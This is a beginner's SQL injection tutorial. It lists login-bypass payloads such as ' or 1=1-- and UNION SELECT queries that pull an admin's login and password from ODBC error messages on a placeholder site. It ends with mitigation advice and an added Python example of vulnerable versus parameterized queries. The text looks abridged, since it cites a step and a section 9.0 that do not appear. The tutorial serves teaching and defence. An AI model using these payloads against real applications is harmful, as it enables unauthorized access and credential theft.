sql injection

The following article will try to help beginners with SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.

1. Introduction

SQL injection is one type of web attack that requires nothing but port 80, and it might just work even if the admin is patch-happy. It targets the web application (ASP, JSP, PHP, CGI, etc.) itself rather than the web server or the services running on the OS. We would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out “9.0 Where can I get more info?” for the people who truly deserve credit for developing many of the techniques in SQL injection.

2. What is SQL Injection?

It is a way to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and build an SQL query to the database. With SQL injection, it is possible for us to send a crafted user name and/or password field that changes the SQL query and thus grants us something else.

3. What should you look for?

Try to look for pages that allow you to submit data, e.g. a login page, search page, feedback form, etc. Sometimes HTML pages use the POST method to send parameters to another ASP page, so you may not see the parameters in the URL. However, you can check the HTML source and look for the “FORM” tag. You may find something like this in some HTML code:

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between <FORM> and </FORM> is a potential parameter that might be useful.

4. What if you can’t find any page that takes input?

You should look for ASP, JSP, CGI, or PHP pages. Look especially for URLs that take parameters, like:

http://xyz.com/index.asp?id=10

5. How do you test if it is vulnerable?

Start with the single-quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://xyz.com/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the HTML source from the site, save it to your hard disk, and modify the URL and the hidden field accordingly. Example:

<FORM action=http://xyz.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>

If luck is on your side, you will be logged in without any login name or password. Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

6. How to retrieve any data we want?

Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database. Now, let’s get the first login_name from the “admin_login” table.

http://xyz.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

http://xyz.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now log in as “neo” with his password “m4trix”.

7. How to avoid SQL Injection?

Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:

  • Input from users
  • Parameters from URL
  • Values from cookie

For a numeric value, convert it to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer. Change the “Startup and run SQL Server” setting in the SQL Server Security tab to use a low-privilege user. Delete stored procedures that you are not using.
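To make the difference between the vulnerable pattern of section 5 and the fixes of section 7 concrete, here is an added example that is not part of the original article: a constructed in-memory SQLite stand-in for the “admin_login” table, a login check that concatenates user input into the query (the pattern the single-quote probe defeats), the same check with bound parameters, and a numeric lookup that converts the id to an integer first. The table contents, function names and the use of SQLite in place of SQL Server are assumptions for illustration.

```python
import sqlite3


def build_db():
    # Constructed sample data standing in for the article's admin_login table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_login (login_name TEXT, password TEXT)")
    conn.execute("INSERT INTO admin_login VALUES ('neo', 'm4trix')")
    return conn


def login_vulnerable(conn, user, pw):
    # The pattern the article attacks: input pasted straight into the SQL text,
    # so a quote ends the string literal and "--" comments out the rest.
    sql = ("SELECT login_name FROM admin_login WHERE login_name='" + user
           + "' AND password='" + pw + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, user, pw):
    # Mitigation: bound parameters. The driver passes the values separately,
    # so quotes and comment markers are never parsed as SQL syntax.
    sql = "SELECT login_name FROM admin_login WHERE login_name=? AND password=?"
    return conn.execute(sql, (user, pw)).fetchone()


def lookup_by_id(conn, raw_id):
    # Section 7's advice for numeric parameters: convert to int before the
    # value reaches the statement; anything non-numeric is rejected outright.
    try:
        item_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    sql = "SELECT login_name FROM admin_login WHERE rowid=?"
    return conn.execute(sql, (item_id,)).fetchone()


if __name__ == "__main__":
    db = build_db()
    probe = "hi' or 1=1--"  # the article's single-quote probe
    print(login_vulnerable(db, probe, probe))  # ('neo',): check bypassed
    print(login_safe(db, probe, probe))        # None: treated as plain text
    print(lookup_by_id(db, "10 UNION SELECT login_name FROM admin_login"))  # None
```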
